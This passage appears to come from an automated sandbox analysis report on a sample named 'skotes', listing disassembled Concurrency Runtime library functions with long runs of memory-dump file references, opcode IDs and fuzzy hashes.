                                                          • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00C01614
                                                            • Part of subcall function 00C02E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00C02E39
                                                            • Part of subcall function 00C02E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00C02EA8
                                                          • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00C01746
                                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00C017A6
                                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00C017B2
                                                          • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00C017ED
                                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00C0180E
                                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00C0181A
                                                          • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00C01823
                                                          • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00C0183B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                          • String ID:
                                                          • API String ID: 2508902052-0
                                                          • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                          • Instruction ID: 4fe884993dbedc57293a28ac45ac14fd36bf944c4bf2f1b8b400cb662f797912
                                                          • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                          • Instruction Fuzzy Hash: CA816B71E002259FCB19CFA8C984A6DF7F5FF48304B1982ADE815A7781C771AD42CB84
                                                          APIs
                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0EC81
                                                            • Part of subcall function 00C08F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00C08F50
                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00C0ECE7
                                                          • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00C0ECFF
                                                          • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00C0ED0C
                                                            • Part of subcall function 00C0E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00C0E7D7
                                                            • Part of subcall function 00C0E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00C0E86F
                                                            • Part of subcall function 00C0E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00C0E879
                                                            • Part of subcall function 00C0E7AF: Concurrency::location::_Assign.LIBCMT ref: 00C0E8AD
                                                            • Part of subcall function 00C0E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00C0E8B5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                          • String ID:
                                                          • API String ID: 2363638799-0
                                                          • Opcode ID: d62c612334bf54639c1a5e0b80487dd474084918b2608dce3e48469e8ba1b6e6
                                                          • Instruction ID: c6d9e9a606e3d931f612f9e2ceaf4ee412c99c1a52ee93e02e9dfd276ef5fd37
                                                          • Opcode Fuzzy Hash: d62c612334bf54639c1a5e0b80487dd474084918b2608dce3e48469e8ba1b6e6
                                                          • Instruction Fuzzy Hash: 1251A031A40215DBDF24EF50C895BAEB775EF44710F1884A8E9067B3D2CB71AE05DBA1
                                                          APIs
                                                          • NtFlushProcessWriteBuffers.NTDLL ref: 00BFCBAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BuffersFlushProcessWrite
                                                          • String ID:
                                                          • API String ID: 2982998374-0
                                                          • Opcode ID: 4a28196aa06ef9ceaa9acd6cef37519a6c4b536fa98ed57dd4348a650f7d8a45
                                                          • Instruction ID: 7c1709a356877fd269559f5e3cb79b46ffbbf9d38517e7c2004dbbca6a460156
                                                          • Opcode Fuzzy Hash: 4a28196aa06ef9ceaa9acd6cef37519a6c4b536fa98ed57dd4348a650f7d8a45
                                                          • Instruction Fuzzy Hash: F4B09236B2383847CA516B14BC187AEBB54AA81A1130A0196ED05A72258A111D828BD4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79e6ff6df0f16b5e283471986baa9aac0a8985caec0fd1f7035b489ab3f9bc77
                                                          • Instruction ID: 164edc1c7b814f083aa9327d5808af8eb44697d7db84305acbd2da574142e087
                                                          • Opcode Fuzzy Hash: 79e6ff6df0f16b5e283471986baa9aac0a8985caec0fd1f7035b489ab3f9bc77
                                                          • Instruction Fuzzy Hash: 70519BB6E0160ACBDB15CF58D8857BEBBF2FB48304F2485AAD605EB250D374AD44CB90
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BFF2BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
